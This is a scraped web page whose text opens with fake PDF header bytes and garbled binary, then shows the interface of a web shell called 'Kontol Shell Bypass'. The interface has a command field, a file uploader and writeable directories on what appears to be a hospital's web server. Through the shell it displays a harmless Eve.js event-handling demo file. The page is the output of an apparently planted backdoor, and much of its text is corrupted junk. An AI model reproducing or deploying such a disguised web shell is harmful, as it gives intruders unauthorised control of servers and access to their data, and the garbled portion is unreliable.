%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/lp/hospital-lms/bower_components/eve-raphael/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //var/www/html/shardahospital_old.org/lp/hospital-lms/bower_components/eve-raphael/e.html
<!DOCTYPE html>
<html lang="en">
    <meta charset="utf-8">
    <title>Eve Use Case</title>
    <script src="eve.js"></script>
    <script>
        var log = function (text) {
            log.log = log.log || [];
            log.log.push(text);
        };
        window.onload = function () {
            document.getElementById("res").innerHTML = log.log.join("<br>");
        };
    </script>
    <script>
        var f1, f2, f3, f4;

        // setting up listeners
        eve.on("hit", f1 = function () {
            log("   I’m hit!");
        });
        eve.on("hit/face", f2 = function () {
            log("   Oh, my face!");
        });
        eve.on("hit/chest", f3 = function () {
            log("   Oh, my chest!");
        });
        eve.on("hit/*/leg", f4 = function () {
            log("   Ouch!");
        });
        eve.once("hit", function () {
            log("   You scoundrel!");
        })(-1);
        
        // fire events
        log("In your face!");
        eve("hit/face");
        // I’m hit!
        // Oh, my face!
        log("Take that!");
        // You can use “.” or “/” as delimiter
        eve("hit.chest.leg");
        // I’m hit!
        // Oh, my chest!
        // Ouch!

        // Unbinding
        log("");
        eve.unbind("hit", f3);
        log("Take that!");
        eve("hit.chest.leg");
        // I’m hit!
        // Ouch!

        // Unbinding by wildcard
        log("");
        eve.unbind("hit/*");
        log("In your face!");
        eve("hit.face");
        // I’m hit!
        log("Take that!");
        eve("hit.chest.leg");
        // I’m hit!
    </script>
    <pre id="res"></pre>
</html>

Kontol Shell Bypass